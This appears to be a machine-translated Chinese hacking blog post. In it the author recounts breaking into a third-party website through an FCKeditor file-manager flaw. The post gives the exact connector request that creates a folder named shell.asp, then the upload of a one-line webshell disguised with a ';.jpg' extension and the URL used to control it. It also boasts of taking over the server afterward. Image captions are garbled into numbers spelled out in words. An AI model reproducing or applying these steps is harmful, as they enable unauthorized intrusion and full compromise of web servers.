FCK breaks through the creation of folders and gets the shell in the background

Today, I was going to set up a station. After doing some research on this station, I found that there was no exploitable loophole in this station. At this time, I felt a bit of pain, so I wanted to find a side station to raise my power. I scanned a few sites on the side station, and finally I logged into the backstage of a station and looked at it in the backstage, I found that it was an FCK editor. I was a bit hopeful. I immediately thought of creating folders with the breakthrough of FCK loophole Try it. Now I will write down the method of getting the shell in the background of FCK breakthrough folder creation. There are many such tutorials in Baidu. Now I'd better write a slightly detailed one.

Find a place to add news, click Upload Picture → Browse Server, as shown below:

 fck

Then create a new folder named qxz.asp  As shown below:

 seventeen million two hundred and twenty-four thousand one hundred and thirty

But it was automatically named as qxz_asp As shown below:

 seven million two hundred and twenty-four thousand five hundred and nine

Next, we will use the bypass code to break through. The code is as follows:

FCKeditor/editor/filemanager/connectors/asp/connector.asp? Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

Add the above code to the website link and press Enter. For example: http://www.xxx.com/ FCKeditor/editor/filemanager/connectors/asp/connector.asp? Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

OK succeeded

 thirty-one billion one hundred and seventeen million two hundred and twenty-five thousand two hundred and ten

Then close this page and click Add Image Browsing Server again. Automatically created a shell.asp Folder for

 one billion one hundred and seventeen million two hundred and twenty-five thousand seven hundred and thirty-four

Then change the name of a sentence to yjh.asp;. jpg Upload a sentence to this folder.

 one hundred and thirty-one billion one hundred and seventeen million two hundred and thirty thousand two hundred and forty

OK kitchen knife link address http://www.xxx . com/ Upload/image/shell.asp/yjh_asp;. jpg

 thirty-one billion one hundred and seventeen million two hundred and thirty thousand seven hundred and twenty-four

Finally, I went to Malaysia and finally got the server after a fight to raise the power. It was getting late, so I stopped writing about the process of raising the power.

Original article reprint please specify: reprint from Seven Travelers Blog

Fixed link of this article: https://www.qxzxp.com/3961.html

FCK broke through the creation of folders and got the shell in the background: there is currently 1 message

  1. 2013-11-18 17:47 [Reply]

Comment

1 + 8 =

Shortcut key: Ctrl+Enter